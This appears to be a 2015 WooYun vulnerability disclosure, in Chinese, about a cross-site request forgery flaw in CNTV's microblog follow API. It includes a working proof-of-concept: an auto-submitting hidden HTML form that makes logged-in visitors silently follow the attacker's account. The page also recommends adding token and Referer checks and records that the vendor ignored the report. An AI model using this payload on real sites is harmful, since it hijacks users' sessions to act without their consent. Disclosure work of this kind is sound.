当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095332

漏洞标题:中国网络电视台官方CSRF刷微博粉

相关厂商:中国网络电视台

漏洞作者: 月小对

提交时间:2015-02-03 10:47

修复时间:2015-02-08 10:48

公开时间:2015-02-08 10:48

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-03: 细节已通知厂商并且等待厂商处理中
2015-02-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

近日随便逛了一下CNTV,找个csrf漏洞。后发现CNTV的reffer对csrf没有效果。
当然也没有看见token来防护csrf。
这里主要是利用来刷个人主页的微博粉。

详细说明:

1.来到CNTV微博,这里先关注个女主播,就选她吧,啧啧,听说是春晚的主持啊,看好你哦美女

1.jpg


2.抓包分析,哈哈,没看到token字段,只有Reffer,那我们就测一下这个reffer有没有对csrf的防护效果吧

2.jpg


3.自己做一个隐藏表单,模拟用户提交:id改成楼主自己的364190xx,让别人“悄悄”关注楼主,刷粉
POC:

<form method='post' action='http://t.cntv.cn/?m=api/weibo/action.createFriendship&_=142288703327'>
<input type='text' value='364190xx' name='uid' style='display:none!important;display:block;width=0;height=0' />
<input type='text' value='0' name='type' style='display:none!important;display:block;width=0;height=0' />
</form>
<script>document.forms[0].submit();
</script>


4.html页面保存,拿一台kali主机作实验哦
csrf成功
看到error=0,表示成功

5.jpg


效果如下,在楼主的主页可以看到,受害者“关注”自己了

6.jpg


漏洞证明:

csrf成功
看到error=0,表示成功

5.jpg


效果如下,在楼主的主页可以看到,受害者“关注”自己了

6.jpg

修复方案:

对于csrf,加入reffer,token的防护

版权声明:转载请注明来源 月小对@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-08 10:48

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-03 11:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    这个竟然还大厂商了。。